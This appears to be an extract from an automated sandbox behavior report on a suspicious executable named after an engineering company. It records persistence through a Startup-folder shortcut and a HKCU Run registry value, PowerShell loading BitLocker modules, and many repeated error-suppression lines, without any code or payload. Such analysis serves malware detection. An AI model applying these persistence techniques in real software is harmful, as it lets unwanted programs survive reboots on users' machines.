              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnkJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnkJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.Jump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd.Jump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
